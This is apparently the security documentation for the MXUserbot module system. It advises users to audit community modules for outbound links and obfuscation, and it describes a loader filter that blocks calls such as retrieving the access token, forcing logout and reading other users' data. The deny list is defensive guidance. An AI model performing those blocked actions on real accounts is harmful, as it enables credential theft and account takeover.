The security of running user (community) modules in MXUserbot relies on two core principles:

As a user of the userbot, YOU must clearly understand: the core does not have multi-layered protection against malicious scripts, nor does it run modules in a separate isolated environment (sandbox).

This is quite difficult for a single developer on the team to implement, so it is what it is :)

Therefore, YOU accept full responsibility for installing modules that come NOT from the system repository. The system repository is considered trusted by default, as all modules there undergo strict review and testing before being added to the database.

• Self-Audit: YOU must independently check the source code of each community module for malicious functions.
• How to check code if you are not a programmer:
  • Look out for third-party links in the code (sending data to unknown websites).
  • Watch out for strange, unreadable character sets (obfuscation) or hidden commands.
  • In doubt? Drop the module's code into an AI with a request to analyze it for vulnerabilities, or visit our SUPPORT room.
• What to do if a threat is found: If you notice that a module contains malicious code — DO NOT INSTALL IT UNDER ANY CIRCUMSTANCES! Immediately report the malicious module or repository to our support room.

Although the bot does not provide 100% protection, it features a built-in system that filters out critically unsafe calls.

• Accessing other users' data in the database;
• Forcing an account logout;
• Retrieving the access token;
• Interacting directly with cryptography;
• Retrieving the list of authorized devices and other critical API methods.

How it works: If the core detects an unsafe call in the code during module loading, the bot will simply refuse to run that module. The malicious script will be isolated before it can even start.